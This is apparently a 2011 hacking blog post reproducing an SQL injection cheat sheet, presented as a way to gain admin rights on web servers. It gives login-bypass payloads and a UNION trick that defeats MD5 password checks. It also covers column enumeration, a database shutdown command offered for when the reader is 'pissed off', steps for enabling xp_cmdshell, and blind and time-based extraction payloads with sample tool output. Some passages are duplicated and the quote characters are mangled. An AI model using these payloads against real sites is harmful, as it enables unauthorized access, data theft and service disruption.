- Back to Home »
- Hacking , SQL Injection , website hacking »
- SQL Injection Attacks
Sunday, October 16, 2011
In the world of hackers and hacking this method of exploiting web based services is very common.As the name SQL
injection(Structural query language) means definitely we are going to use some common queries of SQL a very strong 4GL language which is generally used by data base programmers to manipulate with data base of a system, server and application software’s.hear i will give you some popularly used SQL equerries which helps you to get admin rights in any web servers.
injection(Structural query language) means definitely we are going to use some common queries of SQL a very strong 4GL language which is generally used by data base programmers to manipulate with data base of a system, server and application software’s.hear i will give you some popularly used SQL equerries which helps you to get admin rights in any web servers.
SOME COMMON PASSWORDS
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
· admin’ —
· admin’ #
· admin’/*
· ‘ or 1=1–
· ‘ or 1=1#
· ‘ or 1=1/*
· ‘) or ’1′=’1–
· ‘) or (’1′=’1–
· ….
· Login as different user (SM*)‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–
*Old versions of MySQL doesn’t support union queries
Bypassing second MD5 hash check login screens
If application is first getting the record by user name and then compare returned MD5 with supplied password’s MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
Username : admin
Password : 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055
Password : 1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ’81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Error Based – Find Columns Names
Finding Column Names with HAVING BY – Error Based (S)
In the same order,
· ‘ HAVING 1=1 —
· ‘ GROUP BY table.columnfromerror1 HAVING 1=1 —
· ‘ GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 –
· ‘ GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 – and so on
· If you are not getting any more error then it’s done.
Finding how many columns in SELECT query by ORDER BY (MSO+)
Finding column number by ORDER BY can speed up the UNION SQL Injection process.
· ORDER BY 1–
· ORDER BY 2–
· ORDER BY N– so on
· Keep going until get an error. Error means you found the number of selected columns.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,’x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off, ‘;shutdown –
Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure ‘show advanced options’,1
RECONFIGURE
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’,1
RECONFIGURE
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = ‘U’
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = ‘tablenameforcolumnnames’)
Blind SQL Injections
About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.
In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY ’0:0:10′ in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
TRUE and FALSE flags mark queries returned true or false.
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)>78–
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)>103–
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)<103–>FALSE> : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)>89–
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)<89–>FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)>83–
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)<83–>FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)>80–
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0×55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0×55)),1,1)),0)<80–>
Since both of the last 2 queries failed we clearly know table name’s first char’s ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.
Waiting For Blind SQL Injections
First of all use this if it’s really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
WAIT FOR DELAY ‘time’ (S)
This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY ’0:0:10′–
Also you can use fractions like this,
WAITFOR DELAY ’0:0:0.51′
Real World Samples
· Are we ‘sa’ ?if (select user) = ‘sa’ waitfor delay ’0:0:10′
· ProductID = 1;waitfor delay ’0:0:10′–
· ProductID =1);waitfor delay ’0:0:10′–
· ProductID =1′;waitfor delay ’0:0:10′–
· ProductID =1′);waitfor delay ’0:0:10′–
· ProductID =1));waitfor delay ’0:0:10′–
· ProductID =1′));waitfor delay ’0:0:10′–
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
· Are we root ? woot!IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(1))
· Check Table exist in MySQLIF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleep for supplied seconds.
· SELECT pg_sleep(10);
Sleep 10 seconds.
Sleep 10 seconds.